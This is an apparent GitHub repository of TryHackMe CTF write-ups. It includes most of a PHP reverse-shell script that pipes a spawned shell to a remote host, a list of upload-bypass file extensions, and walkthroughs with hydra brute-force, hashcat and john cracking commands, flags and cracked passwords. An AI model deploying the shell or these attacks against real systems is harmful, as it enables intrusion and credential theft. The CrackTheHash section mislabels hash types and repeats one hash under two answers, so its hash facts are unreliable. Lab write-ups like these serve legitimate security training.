https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_owasp/screenshots/day07/stored32.png -------------------------------------------------------------------------------- /room_owasp/screenshots/day07/stored33.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_owasp/screenshots/day07/stored33.png -------------------------------------------------------------------------------- /room_owasp/screenshots/day08/cookie1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_owasp/screenshots/day08/cookie1.png -------------------------------------------------------------------------------- /room_owasp/screenshots/day08/cookie2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_owasp/screenshots/day08/cookie2.png -------------------------------------------------------------------------------- /room_owasp/screenshots/day08/cyberchef.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_owasp/screenshots/day08/cyberchef.png -------------------------------------------------------------------------------- /room_owasp/screenshots/day08/flag.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_owasp/screenshots/day08/flag.png -------------------------------------------------------------------------------- /room_owasp/screenshots/day09/exploit-db.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_owasp/screenshots/day09/exploit-db.png -------------------------------------------------------------------------------- /room_owasp/screenshots/day09/index.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_owasp/screenshots/day09/index.png -------------------------------------------------------------------------------- /room_owasp/screenshots/day09/shell.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_owasp/screenshots/day09/shell.png -------------------------------------------------------------------------------- /room_owasp/screenshots/owasp.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_owasp/screenshots/owasp.png -------------------------------------------------------------------------------- /room_vulnversity/file.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_vulnversity/file.txt -------------------------------------------------------------------------------- /room_vulnversity/php-reverse-shell.phtml: -------------------------------------------------------------------------------- 1 | array("pipe", "r"), // stdin is a pipe that the child will read from 109 | 1 => array("pipe", "w"), // stdout is a pipe that the child will write to 110 | 2 => array("pipe", "w") // stderr is a pipe that the child will write to 111 | ); 112 | 113 | $process = proc_open($shell, $descriptorspec, $pipes); 114 | 115 | if (!is_resource($process)) { 116 | printit("ERROR: Can't spawn shell"); 117 | exit(1); 118 | } 119 | 120 | // Set everything to non-blocking 121 | // Reason: Occsionally reads will block, even though stream_select tells us they won't 122 | stream_set_blocking($pipes[0], 0); 123 | stream_set_blocking($pipes[1], 0); 124 | stream_set_blocking($pipes[2], 0); 125 | stream_set_blocking($sock, 0); 126 | 127 | printit("Successfully opened reverse shell to $ip:$port"); 128 | 129 | while (1) { 130 | // Check for end of TCP connection 131 | if (feof($sock)) { 132 | printit("ERROR: Shell connection terminated"); 133 | break; 134 | } 135 | 136 | // Check for end of STDOUT 137 | if (feof($pipes[1])) { 138 | printit("ERROR: Shell process terminated"); 139 | break; 140 | } 141 | 142 | // Wait until a command is end down $sock, or some 143 | // command output is available on STDOUT or STDERR 144 | $read_a = array($sock, $pipes[1], $pipes[2]); 145 | $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null); 146 | 147 | // If we can read from the TCP socket, send 148 | // data to process's STDIN 149 | if (in_array($sock, $read_a)) { 150 | if ($debug) printit("SOCK READ"); 151 | $input = fread($sock, $chunk_size); 152 | if ($debug) printit("SOCK: $input"); 153 | fwrite($pipes[0], $input); 154 | } 155 | 156 | // If we can read from the process's STDOUT 157 | // send data down tcp connection 158 | if (in_array($pipes[1], $read_a)) { 159 | if ($debug) printit("STDOUT READ"); 160 | $input = fread($pipes[1], $chunk_size); 161 | if ($debug) printit("STDOUT: $input"); 162 | fwrite($sock, $input); 163 | } 164 | 165 | // If we can read from the process's STDERR 166 | // send data down tcp connection 167 | if (in_array($pipes[2], $read_a)) { 168 | if ($debug) printit("STDERR READ"); 169 | $input = fread($pipes[2], $chunk_size); 170 | if ($debug) printit("STDERR: $input"); 171 | fwrite($sock, $input); 172 | } 173 | } 174 | 175 | fclose($sock); 176 | fclose($pipes[0]); 177 | fclose($pipes[1]); 178 | fclose($pipes[2]); 179 | proc_close($process); 180 | 181 | // Like print, but does nothing if we've daemonised ourself 182 | // (I can't figure out how to redirect STDOUT like a proper daemon) 183 | function printit ($string) { 184 | if (!$daemon) { 185 | print "$string\n"; 186 | } 187 | } 188 | 189 | ?> 190 | 191 | 192 | 193 | -------------------------------------------------------------------------------- /room_vulnversity/phpext.txt: -------------------------------------------------------------------------------- 1 | .php 2 | .php3 3 | .php4 4 | .php5 5 | .phtml 6 | -------------------------------------------------------------------------------- /room_vulnversity/screenshots/burpsuite.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_vulnversity/screenshots/burpsuite.png -------------------------------------------------------------------------------- /room_vulnversity/screenshots/flag.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_vulnversity/screenshots/flag.png -------------------------------------------------------------------------------- /room_vulnversity/screenshots/gobuster.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_vulnversity/screenshots/gobuster.png -------------------------------------------------------------------------------- /room_vulnversity/screenshots/gtfobins.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_vulnversity/screenshots/gtfobins.png -------------------------------------------------------------------------------- /room_vulnversity/screenshots/ls_cmd.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_vulnversity/screenshots/ls_cmd.png -------------------------------------------------------------------------------- /room_vulnversity/screenshots/netcat.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_vulnversity/screenshots/netcat.png -------------------------------------------------------------------------------- /room_vulnversity/screenshots/peass.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_vulnversity/screenshots/peass.png -------------------------------------------------------------------------------- /room_vulnversity/screenshots/peass1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_vulnversity/screenshots/peass1.png -------------------------------------------------------------------------------- /room_vulnversity/screenshots/reverse_shell.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_vulnversity/screenshots/reverse_shell.png -------------------------------------------------------------------------------- /room_vulnversity/screenshots/suid.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_vulnversity/screenshots/suid.jpg -------------------------------------------------------------------------------- /room_vulnversity/screenshots/upload_form.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_vulnversity/screenshots/upload_form.png -------------------------------------------------------------------------------- /room_vulnversity/screenshots/wordlist.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_vulnversity/screenshots/wordlist.png -------------------------------------------------------------------------------- /room_vulnversity/vulnversity_scan_results.log: -------------------------------------------------------------------------------- 1 | # Nmap 7.80 scan initiated Wed Sep 16 12:32:08 2020 as: nmap -sV -oN vulnversity_scan_results.log 10.10.77.241 2 | Nmap scan report for 10.10.77.241 3 | Host is up (0.23s latency). 4 | Not shown: 994 closed ports 5 | PORT STATE SERVICE VERSION 6 | 21/tcp open ftp vsftpd 3.0.3 7 | 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0) 8 | 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 9 | 445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 10 | 3128/tcp open http-proxy Squid http proxy 3.5.12 11 | 3333/tcp open http Apache httpd 2.4.18 ((Ubuntu)) 12 | Service Info: Host: VULNUNIVERSITY; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel 13 | 14 | Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . 15 | # Nmap done at Wed Sep 16 12:32:52 2020 -- 1 IP address (1 host up) scanned in 43.94 seconds 16 | -------------------------------------------------------------------------------- /room_web_fundamentals/requests.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_web_fundamentals/requests.png -------------------------------------------------------------------------------- /room_web_fundamentals/screenshots/get.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_web_fundamentals/screenshots/get.png -------------------------------------------------------------------------------- /room_web_fundamentals/screenshots/get_cookie.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_web_fundamentals/screenshots/get_cookie.png -------------------------------------------------------------------------------- /room_web_fundamentals/screenshots/post.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_web_fundamentals/screenshots/post.png -------------------------------------------------------------------------------- /room_web_fundamentals/screenshots/server.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_web_fundamentals/screenshots/server.png -------------------------------------------------------------------------------- /room_web_fundamentals/screenshots/set_cookie.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_web_fundamentals/screenshots/set_cookie.png -------------------------------------------------------------------------------- /writeups/BasicPentesting.md: -------------------------------------------------------------------------------- 1 | # Basic Pentesting 2 | 3 | This walkthrough is for the [Basic Pentesting room](https://tryhackme.com/room/basicpentestingjt) from TryHackMe. 4 | 5 | ### Web App Testing and Privilge Escalation 6 | 7 | 1. Deploy the machine and connect to our network. 8 | 9 | Machine IP: 10.10.37.123 10 | 11 | > No answer needed 12 | 13 | 2. Find the services exposed by the machine. 14 | 15 | For this, I used nmap (Command: `nmap 10.10.37.123 -sV`). You can see the scan results [here](https://github.com/pamhrituc/TryHackMe_Writeups/blob/master/room_basic_pentest/results.log) 16 | 17 | > No answer needed 18 | 19 | 3. What is the name of the hidden directory on the web server(enter name without /)? 20 | 21 | To find hidden directories, I used gobuster (`gobuster dir -u http://10.10.37.123/ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt`). After letting it run for a while, it gave me the hidden directory I was looking for. 22 | 23 | ![screenshot_gobuster](/room_basic_pentest/screenshots/gobuster.png?raw=true) 24 | 25 | > development 26 | 27 | 4. User brute-forcing to find the username & password 28 | 29 | For this part, I used enum4linux. It comes preinstalled on Kali Linux, or it can be found [here](https://github.com/CiscoCXSecurity/enum4linux). Command: `enum4linux -a 10.10.37.123` (the -a flag for all simple enumeration; check `enum4linux -h` for more information on the options). 30 | 31 | ![screenshot_enum4linux](/room_basic_pentest/screenshots/enum4linux.png?raw=true) 32 | 33 | > No answer needed 34 | 35 | 5. What is the username 36 | 37 | > jan 38 | 39 | 6. What is the password? 40 | 41 | To find the password, I used hydra (`hydra -l jan -P /usr/share/wordlists/rockyou.txt ssh://10.10.37.123:22`), knowing the username (*jan*) for the SSH service (*port 22*). 42 | 43 | ![screenshot_hydra](/room_basic_pentest/screenshots/hydra.png?raw=true) 44 | 45 | > armando 46 | 47 | 7. What service do you use to access the server(answer in abbreviation in all caps)? 48 | 49 | > SSH 50 | 51 | Now that we have the username and corresponding password for *jan*, I can log into the machine using SSH. (`ssh jan@10.10.37.123`) 52 | 53 | 8. Enumerate the machine to find any vectors for privilege escalation 54 | 55 | For this, I used Privilege Escalation Awesome Script or [PEAS](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS). I uploaded the *linpeas.sh* file to the server (`scp linpeas.sh jan@10.10.37.123:/tmp`, with jan's password) and ran the script. 56 | 57 | > No answer needed 58 | 59 | 9. What is the name of the other user you found(all lower case)? 60 | 61 | See question 4. 62 | 63 | > kay 64 | 65 | 10. If you have found another user, what can you do with this information? 66 | 67 | Using LinPEAS, one of the vectors for privesc that was found was kay's rsa private key, which can be used to access the machine using SSH. 68 | 69 | > No answer needed 70 | 71 | 11. What is the final password you obtain? 72 | 73 | Since we found kay's rsa private key, I attempted to use this file to log into the machine as kay. The attempt asked for a passphrase, which, with the help of johntheripper, I found. 74 | 75 | Commands to obtain passphrase: 76 | * `ssh2john.py kay_id_rsa > forjohn.txt` 77 | * `john forjohn.txt --wordlist=/usr/share/worlists/rockyou.txt` 78 | 79 | ![screenshot_john](/room_basic_pentest/screenshots/john.png?raw=true) 80 | 81 | After obtaining the passphrase, I was able to log in as kay using ssh (`ssh -i kay_id_rsa kay@10.10.37.123`) and read the file kay had in their home directory (*pass.bak*) 82 | 83 | > heresareallystrongpasswordthatfollowsthepasswordpolicy$$ 84 | -------------------------------------------------------------------------------- /writeups/CrackTheHash.md: -------------------------------------------------------------------------------- 1 | # Crack the hash 2 | 3 | [Room](https://tryhackme.com/room/crackthehash) 4 | 5 | ### Task 1: Level 1 6 | 7 | Can you complete the level 1 tasks by cracking the hashes? 8 | 9 | 1. 48bb6e862e54f2a795ffc4e541caed4d 10 | 11 | The hint says this is an md5 hash. Command to crack the hash: `hashcat -m 0 hash1_1.txt /usr/share/wordlists/rockyou.txt --show` 12 | 13 | > easy 14 | 15 | 2. CBFDAC6008F9CAB4083784CBD1874F76618D2A97 16 | 17 | The hint says this is a sha.. hash. Since hashcat can crack only 4 types of sha hashes, I tried all of them until one was successful. Turns out it was a SHA1 hash. Command to crack the hash : `hashcat -m 100 hash1_2.txt /usr/share/wordlists/rockyou.txt --show` 18 | 19 | > password123 20 | 21 | 3. 1C8BFE8F801D79745C4631D09FFF36C82AA37FC4CCE4FC946683D7B336B63032 22 | 23 | The hint says this is a sha.. hash. Same strategy used in the previous question. Turns out it was a SHA256 hash. Command used to crack the hash: `hashcat -m 1400 hash1_3.txt /usr/share/wordlists/rockyou.txt --show` 24 | 25 | > letmein 26 | 27 | 4. $2y$12$Dwt1BZj6pcyc3Dy1FWZ5ieeUznr71EeNkJkUlypTsgbX1H68wsRom 28 | 29 | The hint says this is a bcrypt hash. Command used to crack the hash: `hashcat -m 3200 hash1_4.txt /usr/share/wordlists/rockyou.txt` 30 | 31 | > bleh 32 | 33 | 5. 279412f945939ba78ce0758d3fd83daa 34 | 35 | The hint says this is a md4 hash. I tried using the following command used to crack the hash: `hashcat -m 900 hash1_5.txt /usr/share/wordlists/rockyou.txt`, yet hashcat didn't find the password in the rockyou.txt file, so I used the following online tool to crack the hash: [link](https://md5decrypt.net/en/Md4/). 36 | 37 | > Eternity22 38 | 39 | ### Task 2: Level 2 40 | 41 | This task increases the difficulty. All of the answers will be in the classic [rock you](https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt) password list. 42 | 43 | You might have to start using hashcat here and not online tools. It might also be handy to look at some example hashes on [hashcats page](https://hashcat.net/wiki/doku.php?id=example_hashes). 44 | 45 | 1. Hash: F09EDCB1FCEFC6DFB23DC3505A882655FF77375ED8AA2D1C13F640FCCC2D0C85 46 | 47 | It seems this is a SHA256 hash. Command used to crack the hash: `hashcat -m 1400 hash2_1.txt /usr/share/wordlists/rockyou.txt` 48 | 49 | > paule 50 | 51 | 2. Hash: $6$aReallyHardSalt$6WKUTqzq.UQQmrm0p/T7MPpMbGNnzXPMAXi4bJMl9be.cfi3/qxIf.hsGpS41BqMhSrHVXgMpdjS6xeKZAs02. 52 | 53 | Salt: aReallyHardSalt 54 | 55 | Rounds: 5 56 | 57 | The hint says this is a NTLM hash. Command used to crack the hash: `hashcat -m 1000 hash2_2.txt /usr/share/wordlists/rockyou.txt` 58 | 59 | > n63umy8lkf4i 60 | 61 | 3. Hash: e5d8870e5bdd26602cab8dbe07a942c8669e56d6 62 | 63 | Salt: tryhackme 64 | 65 | This one seems to be a SHA-512(Unix) hash. Command used to crack the hash: `hashcat -m 1800 hash2_3.txt /usr/share/wordlists/rockyou.txt` 66 | 67 | > waka99 68 | 69 | 4. Hash: e5d8870e5bdd26602cab8dbe07a942c8669e56d6 70 | 71 | Salt: tryhackme 72 | 73 | The hint says this one is a HMAC-SHA1 hash. Command used to crack the hash: `hashcat -m 160 hash2_4.txt /usr/share/wordlists/rockyou.txt`. 74 | 75 | > 481616481616 76 | -------------------------------------------------------------------------------- /writeups/Hydra.md: -------------------------------------------------------------------------------- 1 | # Hydra 2 | 3 | [Here's](https://tryhackme.com/room/hydra) the link to the TryHackMe room. 4 | 5 | ### Task 1: Hydra Introduction 6 | 7 | #### What is Hydra? 8 | 9 | Hydra is a brute force online password cracking program; a quick system login password 'hacking' tool. 10 | 11 | We can use Hydra to run through a list and 'bruteforce' some authentication service. Imagine trying to manually guess someones password on a particular service (SSH, Web Application Form, FTP or SNMP) - we can use Hydra to run through a password list and speed this process up for us, determining the correct password. 12 | 13 | Hydra has the ability to bruteforce the following protocols: Asterisk, AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-POST, HTTP-PROXY, HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD, HTTPS-POST, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MYSQL, NCP, NNTP, Oracle Listener, Oracle SID, Oracle, PC-Anywhere, PCNFS, POP3, POSTGRES, RDP, Rexec, Rlogin, Rsh, RTSP, SAP/R3, SIP, SMB, SMTP, SMTP Enum, SNMP v1+v2+v3, SOCKS5, SSH (v1 and v2), SSHKEY, Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP. 14 | 15 | For more information on the options of each protocol in Hydra, read the official Kali Hydra tool page: https://en.kali.tools/?p=220 16 | 17 | This shows the importance of using a strong password, if your password is common, doesn't contain special characters and/or is not above 8 characters, its going to be prone to being guessed. 100 million password lists exist containing common passwords, so when an out-of-the-box application uses an easy password to login, make sure to change it from the default! Often CCTV camera's and web frameworks use admin:password as the default password, which is obviously not strong enough. 18 | 19 | #### Installing Hydra 20 | 21 | If you're using Kali Linux, hydra is pre-installed. Otherwise you can download it here: https://github.com/vanhauser-thc/thc-hydra 22 | 23 | If you don't have Linux or the right desktop environment, you can deploy your own Kali Linux machine with all the needed security tools. You can even control the machine in your browser! Do this with our Kali room - https://tryhackme.com/room/kali 24 | 25 | 1. Read the above and have Hydra at the ready. 26 | 27 | > No answer needed 28 | 29 | ### Task 2: Using Hydra 30 | 31 | Deploy the machine attached to this task, then navigate to http://MACHINE_IP *(this machine can take up to 3 minutes to boot)* 32 | 33 | MACHINE_IP: 10.10.139.250 34 | 35 | #### Hydra Commands 36 | 37 | The options we pass into Hydra depends on which service (protocol) we're attacking. For example if we wanted to bruteforce FTP with the username being user and a password list being passlist.txt, we'd use the following command: 38 | 39 | `hydra -l user -P passlist ftp://10.10.139.250` 40 | 41 | For the purpose of this deployed machine, here are the commands to use Hydra on SSH and a web form (POST method). 42 | 43 | #### SSH 44 | 45 | `hydra -l -P 10.10.139.250 -t 4 ssh 46 | 47 | - -l: username 48 | - -P: list of password 49 | - -t: number of threads 50 | 51 | #### Post Web Form 52 | 53 | We can use Hydra to bruteforce web forms too, you will have to make sure you know which type of request its making - a GET or POST methods are normally used. You can use your browsers network tab (in developer tools) to see the request types, of simply view the source code. 54 | 55 | Below is an example Hydra command to brute force a POST login form: 56 | 57 | `hydra -l -P 10.10.139.250 http-post-form "/:username=^USER^&password=^PASS^:F=incorrect" -V 58 | 59 | - -l => username 60 | - -P => password list 61 | - http-post-form => type of form (post) 62 | - /login url => login page URL 63 | - :username => form field where the username is entered 64 | - ^USER^ => tells Hydra to use the username 65 | - password => form field where the password is entered 66 | - ^PASS^ => tells Hydra to use the password list supplied earlier 67 | - Login => indicated to Hydra the Login failed message 68 | - Login failed => login failure message that the form returns 69 | - F=incorrect => if this word appears on the page, it's incorrect 70 | - -V => verbose output 71 | 72 | You should now have enough information to put this to practise and brute-force yourself credentials to the deployed machine! 73 | 74 | 1. Use Hydra to bruteforce molly's web password. What is flag 1? 75 | 76 | Command used: `hydra -l molly -P /usr/share/wordlists/rockyou.txt 10.10.139.250 http-post-form "/login:username=^USER^&password=^PASS^:F=incorrect" -V` 77 | 78 | It doesn't take Hydra more than 46 attempts to find molly's password. I then logged into the machine's login page using molly as username and the obtained password. After logging in, I get the flag. 79 | 80 | > THM{2673a7dd116de68e85c48ec0b1f2612e} 81 | 82 | 2. Use Hydra to bruteforce molly's SSH password. What is flag 2? 83 | 84 | Command used: `hydra -l molly -P /usr/share/wordlists/rockyou.txt 10.10.139.250 -t 4 ssh` (Since we're trying to get molly's SSH password). 85 | 86 | Once Hydra finds molly's SSH password (*butterfly*), I logged into the machine as molly using ssh (`ssh molly@10.10.139.250`). I check what's in the current folder (a flag2.txt file) and use the `cat flag2.txt` command to see what's in the file. 87 | 88 | ![screenshot_molly_ssh](room_hydra/screenshots/molly_ssh.png?raw=true) 89 | 90 | > THM{c8eeb0468febbadea859baeb33b2541b} 91 | -------------------------------------------------------------------------------- /writeups/Nmap.md: -------------------------------------------------------------------------------- 1 | # Nmap 2 | 3 | The room for this walkthrough/writeup can be found [here](https://tryhackme.com/room/rpnmap) 4 | 5 | 6 | ### Task 1: Deploy! 7 | 8 | Machine IP: 10.10.7.229 9 | 10 | ### Task 2: Nmap Quiz 11 | 12 | The answers to this task can be found by reading the help menu for nmap. This can be accessed by using `man nmap` for the manual pages or `nmap -h` for the help menu. 13 | 14 | 1. First, how do you access the help menu? 15 | 16 | > -h 17 | 18 | 2. Often referred to as stealth scan, what is the first switch listed for a 'Syn Scan'? 19 | 20 | > -sS 21 | 22 | 3. Not quite as useful but how about a 'UDP Scan'? 23 | 24 | > -sU 25 | 26 | 4. What about operating system detection? 27 | 28 | > -O 29 | 30 | 5. How about service version detection? 31 | 32 | > -sV 33 | 34 | 6. Most people like to see some output to know that their scan is actually doing things, what is the verbosity flag? 35 | 36 | > -v 37 | 38 | 7. What about 'very verbose'? 39 | 40 | > -vv 41 | 42 | 8. Sometimes saving output in a common document format can be really handy for reporting, how do we save output in xml format? 43 | 44 | > -oX 45 | 46 | 9. Aggressive scans can be nice when other scans just aren't getting the output that you want and you really don't care how 'loud' you are, what is the switch for enabling this? 47 | 48 | > -A 49 | 50 | 10. How do I set the timing to the max level, sometimes called 'Insane'? 51 | 52 | > -T5 53 | 54 | 11. What about if I want to scan a specific port? 55 | 56 | > -p 57 | 58 | 12. How about if I want to scan every port? 59 | 60 | > -p- 61 | 62 | 13. What if I want to enable using a script from the nmap scripting engine? For this, just include the first part of the switch without the specification of what script to run. 63 | 64 | > --script 65 | 66 | 14. What if I want to run all scripts out of the vulnerability category? 67 | 68 | > --script vuln 69 | 70 | 15. What switch should I include if I don't want to ping the host? 71 | 72 | > -Pn 73 | 74 | 75 | ### Task 3: Nmap Scanning 76 | 77 | To complete this task, the machine needs to be deployed. The files containing the Nmap scan results are [here](https://github.com/pamhrituc/TryHackMe_Writeups/tree/master/room_nmap_scan_results) 78 | 79 | 1. Let's go ahead and start with the basics and perform a syn scan on the box provided. What will this command be **without** the host IP address? 80 | 81 | > nmap -sS 82 | 83 | The full command is the following: `nmap -sS 10.10.7.229`, where 10.10.7.229 is the IP address of the deployed machine. [Scan results](https://github.com/pamhrituc/TryHackMe_Writeups/blob/master/room_nmap_scan_results/syn_scan.log) 84 | 85 | 2. After scanning this, how many ports do we find open under 1000? 86 | 87 | > 2 88 | 89 | 3. What communication protocol is given for these ports following the port number? 90 | 91 | > tcp 92 | 93 | 4. Perform a service version detection scan, what is the version of the software running on port 22? 94 | 95 | > 6.6.1p1 96 | 97 | The command to perform the service version detection scan is: `nmap -sV 10.10.7.229`. [Scan results](https://github.com/pamhrituc/TryHackMe_Writeups/blob/master/room_nmap_scan_results/service_version_detection.log) 98 | 99 | 5. Perform an aggressive scan, what flag isn't set under the results for port 80? 100 | 101 | > httponly 102 | 103 | The command that was run to obtain the answer for this question was `nmap -A 10.10.7.229`. [Scan results](https://github.com/pamhrituc/TryHackMe_Writeups/blob/master/room_nmap_scan_results/aggressive_scan.log) 104 | 105 | 6. Perform a script scan of vulnerabilities associated with this box, what denial of service (DOS) attack is this box susceptible to? Answer with the name for the vulnerability that is given as the section title in the scan output. A vuln scan can take a while to complete. In case you get stuck, the answer for this question has been provided in the hint, however, it's good to still run this scan and get used to using it as it can be invaluable. 106 | 107 | > http-slowloris-check 108 | 109 | Command used: `nmap --script vuln 10.10.7.229`. [Scan results](https://github.com/pamhrituc/TryHackMe_Writeups/blob/master/room_nmap_scan_results/vuln_scan.log) 110 | -------------------------------------------------------------------------------- /writeups/OhSINT.md: -------------------------------------------------------------------------------- 1 | # OhSINT 2 | 3 | This is the walkthrough for the [OhSINT room](https://tryhackme.com/room/ohsint) on TryHackMe. 4 | 5 | ### Task 1: OhSINT 6 | 7 | All I have is a photo. I used exiftool to see what starting information I could get of the photo. (`exiftool WindowsXP.jpg`). 8 | 9 | ![screenshot_exiftool](/room_ohsint/screenshots/exiftool.png?raw=true) 10 | 11 | Notice that the Copyright value is OWoodflint. Next, I searched good ol' google to see what I could find on OWoodflint. 12 | 13 | I found their twitter page (answering question 1), 14 | 15 | ![screenshot_twitter](/room_ohsint/screenshots/twitter.png?raw=true) 16 | 17 | their blog (answering questions 6 & 7, if you inspect the blog's HTML), 18 | 19 | ![screenshot_blog](/room_ohsint/screenshots/blog.png?raw=true) 20 | 21 | and their github (answering questions 2, 4 & 5). 22 | 23 | ![screenshot_github](/room_ohsint/screenshots/github.png?raw=true) 24 | 25 | 1. What is this user's avatar of? 26 | 27 | > cat 28 | 29 | 2. What city is this person in? 30 | 31 | > London 32 | 33 | 3. What's the SSID of the WAP he connected to? 34 | 35 | The hint for question 2 mentions *BSSID + Wigle.net*. So, I accessed [Wigle.net](https://wigle.net/) and, plugging in the BSSID found OWoodflint's twitter page, I found the exact location of the WAP and its SSID. Yikes! 36 | 37 | ![screenshot_wigle](/room_ohsint/screenshots/wigle.png?raw=true) 38 | 39 | *Notice the purple circle on the map and zoom in really really close on it.* 40 | 41 | > UnileverWiFi 42 | 43 | 4. What is his personal email address? 44 | 45 | > OWoodflint@gmail.com 46 | 47 | 5. What site did you find his email address on? 48 | 49 | > github 50 | 51 | 6. Where has he gone on holiday? 52 | 53 | > New York 54 | 55 | 7. What is this persons password? 56 | 57 | > pennYDr0pper.! 58 | --------------------------------------------------------------------------------